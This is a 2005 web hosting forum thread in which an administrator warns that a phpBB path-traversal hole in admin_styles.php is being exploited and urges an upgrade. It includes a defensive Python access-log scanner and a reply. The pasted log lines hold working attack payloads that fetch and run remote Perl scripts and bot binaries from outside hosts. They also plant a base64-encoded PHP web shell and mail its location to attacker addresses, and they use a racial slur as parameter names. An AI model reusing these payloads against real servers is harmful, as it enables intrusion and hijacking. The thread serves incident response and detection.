
Upgrade Phpbb Now!!! 2.0.15

Discussion in 'Plesk for Linux - 8.x and Older' started by tekmage, Jun 4, 2005.

  1. tekmage

    tekmage Guest

    Folks, I've been fighting a battle for the last week or so. Some jack*ss script kiddy has been exploiting a hole in phpBB that ships with Plesk 7.5.3 and below.

    I just figured it out last night and I'd like to pass this on ASAP to everyone.

    Run, do not walk, to the phpBB.com site and download 2.0.15, then upgrade any and all sites you have using this software.

    Here is the exploit attempt in my access_logs, you might want to check through yours asap.

    [root@hydra root]# cat /home/httpd/vhosts/*/statistics/logs/access_log* | grep "%20/tmp"
    66.250.130.186 - - [29/May/2005:15:15:50 -0700] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=d86b9a329a43539c22cee9a07ab95fe2&niggaip=1&niggaport=1&nigga=passthru(%22cd%20/tmp;curl%20-C%20-%20http://uhoho.gratishost.com/a.pl%20%3E%20a.pl;perl%20a.pl%22); HTTP/1.1" 200 7926 "http://www.FOOOME.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


    216.57.216.163 - - [15/Jan/2005:05:40:59 -0800] "GET /classifiedweapon.htm&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20users.volja.net/kojpic/botek;wget%20users.volja.net/kojpic/botek;chmod%20777%20/tmp/botek;/tmp/botek;rm%20sess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 404 956 "-" "LWP::Simple/5.64"
    66.240.141.100 - - [02/May/2005:14:32:01 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=718da6c3e60b36417f1d9fa7ea918328&nigga=$out=\"PGZvcm0gbWV0aG9kPXBvc3Q+CjxpbnB1dCBtYXhMZW5ndGg9NTAwIHNpemU9MTAwIG5hbWU9ZW1haWwgPgo8YnI+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUVudm95ZXI+Cjxicj48L2Zvcm0+Cjx0ZXh0YXJlYSByZWFkb25seSAgY29scz0xMjAgcm93cz0zMD48P1BIUCBzeXN0ZW0oJGVtYWlsKSA/PjwvdGV4dGFyZWE+Cgo=\";$ifp=fopen(\"/tmp/.newminibd.php\",\"wb\");fwrite($ifp,base64_decode($out));fclose($ifp);$cmd=exec(\"find%20../../$pwd%20-perm%20777%20-type%20d\");if($cmd){exec(\"cp%20/tmp/.newminibd.php%20\".$cmd);mail(\"phpownz@imail.mohave.edu\",$_SERVER[SERVER_NAME],\"Site%20:%20\".\"http://\".$_SERVER[SERVER_NAME].substr($cmd,5).\"/.newminibd.php\");} HTTP/1.1" 200 7917 "http://www.FOOO.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


    66.240.141.100 - - [02/May/2005:16:56:43 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=ba84ad1a6ff8287142b5f1b0adf0a753&nigga=$out=\"PGZvcm0gbWV0aG9kPXBvc3Q+CjxpbnB1dCBtYXhMZW5ndGg9NTAwIHNpemU9MTAwIG5hbWU9ZW1haWwgPgo8YnI+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUVudm95ZXI+Cjxicj48L2Zvcm0+Cjx0ZXh0YXJlYSByZWFkb25seSAgY29scz0xMjAgcm93cz0zMD48P1BIUCBzeXN0ZW0oJGVtYWlsKSA/PjwvdGV4dGFyZWE+Cgo=\";$ifp=fopen(\"/tmp/.newminibd.php\",\"wb\");fwrite($ifp,base64_decode($out));fclose($ifp);$cmd=exec(\"find%20../../$pwd%20-perm%20777%20-type%20d\");if($cmd){exec(\"mv%20/tmp/.newminibd.php%20\".$cmd);mail(\"buyown@idx82.idx.net\",$_SERVER[SERVER_NAME],\"Site%20:%20\".\"http://\".$_SERVER[SERVER_NAME].substr($cmd,5).\"/.newminibd.php\");} HTTP/1.1" 200 7917 "http://www.FOOO.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    [root@hydra root]# 66.240.141.100 - - [02/May/2005:14:32:01 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=718da6c3e60b36417f1d9fa7ea918328&nigga=$out=\"PGZvcm0gbWV0aG9kPXBvc3Q+CjxpbnB1dCBtYXhMZW5ndGg9NTAwIHNpemU9MTAwIG5hbWU9ZW1haWwgPgo8YnI+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUVudm95ZXI+Cjxicj48L2Zvcm0+Cjx0ZXh0YXJlYSByZWFkb25seSAgY29scz0xMjAgcm93cz0zMD48P1BIUCBzeXN0ZW0oJGVtYWlsKSA/PjwvdGV4dGFyZWE+Cgo=\";$ifp=fopen(\"/tmp/.newminibd.php\",\"wb\");fwrite($ifp,base64_decode($out));fclose($ifp);$cmd=exec(\"find%20../../$pwd%20-perm%20777%20-type%20d\");if($cmd){exec(\"cp%20/tmp/.newminibd.php%20\".$cmd);mail(\"phpownz@imail.mohave.edu\",$_SERVER[SERVER_NAME],\"Site%20:%20\".\"http://\".$_SERVER[SERVER_NAME].substr($cmd,5).\"/.newminibd.php\");} HTTP/1.1" 200 7917 "http://www.FOOOME.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


    If successful it installs a perl script into /tmp that is a udp flood exploit. The file has a random name, but mostly it's called ret.pl

    I started sweeping any and all perl scripts from my /tmp every 3 mins; that didn't work, so I then went down to 1 min.

    I tried securing my /tmp by moving it to a new partition, mounting noexec, nosuid. That did squat.

    Finally I was able to find that above in the access logs and figured out that it was phpBB. I failed at my first attempt to patch it, and got nailed again that night. So I have blown away any and all old copies and started with a fresh 2.0.15 build on all sites using phpBB.

    http://www.phpbb.com/downloads.php


    Also note the two above trigger email addresses.

    buyown@idx82.idx.net

    and

    phpownz@imail.mohave.edu

    You might want to black list those.. I have.

    I'm hoping that this works.. Let me know if you've had similar issues..

    Best,

    -=Dave
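The grep in the post only matches the encoded form `%20/tmp`, so it misses requests where the traversal or the PHP payload is encoded differently. The following is an added example, not code from the original post: a small access_log scanner that parses each line, percent-decodes the request target (including double-encoded forms such as `%2527`), and flags the two indicators visible in the logged requests above: a `../` traversal in `install_to` and PHP execution or file-writing functions in the query string. The sample log lines are constructed for the example; IPs, session ids and payload bodies are placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not from the original post). Lines 2 and 3
# mimic the shape of the admin_styles.php requests described in the thread,
# with the payload bodies replaced by placeholders.
SAMPLE_LOG = """\
10.0.0.1 - - [29/May/2005:15:10:00 -0700] "GET /forum/index.php HTTP/1.1" 200 1234 "-" "Mozilla/4.0"
10.0.0.2 - - [29/May/2005:15:15:50 -0700] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../tmp&sid=0000&x=passthru(%22...%22); HTTP/1.1" 200 7926 "-" "Mozilla/4.0"
10.0.0.3 - - [02/May/2005:14:32:01 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../tmp&sid=0000&x=$ifp=fopen(%22/tmp/.x.php%22,%22wb%22);fwrite($ifp,base64_decode($out)); HTTP/1.1" 200 7917 "-" "Mozilla/4.0"
10.0.0.4 - - [29/May/2005:15:20:00 -0700] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 5555 "-" "Mozilla/4.0"
"""

# Apache combined log format, parsed only as far as the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators, checked against the decoded request target.
TRAVERSAL_RE = re.compile(r'install_to=(?:\.\./)+')
EXEC_FUNC_RE = re.compile(
    r'\b(passthru|system|exec|shell_exec|fopen|fwrite|base64_decode)\s*\('
)


def decode_target(target, max_rounds=3):
    """Percent-decode until stable, so %2527 -> %27 -> ' is caught."""
    prev = target
    for _ in range(max_rounds):
        cur = unquote(prev)
        if cur == prev:
            break
        prev = cur
    return prev


def classify(decoded_target):
    """Return the list of reasons a request looks like the phpBB attack, or []."""
    reasons = []
    if TRAVERSAL_RE.search(decoded_target):
        reasons.append("path traversal in install_to")
    funcs = sorted(set(EXEC_FUNC_RE.findall(decoded_target)))
    if funcs:
        reasons.append("PHP code in query string: " + ", ".join(funcs))
    # A bare /tmp reference is supporting evidence, not enough on its own.
    if not reasons:
        return []
    if "/tmp" in decoded_target:
        reasons.append("reference to /tmp")
    return reasons


def scan_log(text):
    """Parse access_log text and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        reasons = classify(decode_target(m.group("target")))
        if reasons:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": m.group("status"),
                # A 200 means the request was served; the thread's hits were 200s.
                "served": m.group("status") == "200",
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["status"], "; ".join(f["reasons"]))
```

To run it over real logs, replace `SAMPLE_LOG` with the contents of the `access_log*` files under each vhost's `statistics/logs` directory, as in the grep above; a served (`200`) hit with the traversal indicator is the one to treat as a likely compromise and check `/tmp` and the forum's admin directory after.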
     
  2. Outlaw

    Outlaw Guest

    I don't use any program from the Plesk package, because the originals are newer and I don't need an extra database for every program ....

    About phpBB: I have disabled it in the application list for my users, and with the phpBB newsletter I get info about fixes and new versions when they are available, not when someone has manipulated it on my server ....

    The .15 version is a few weeks old ....
     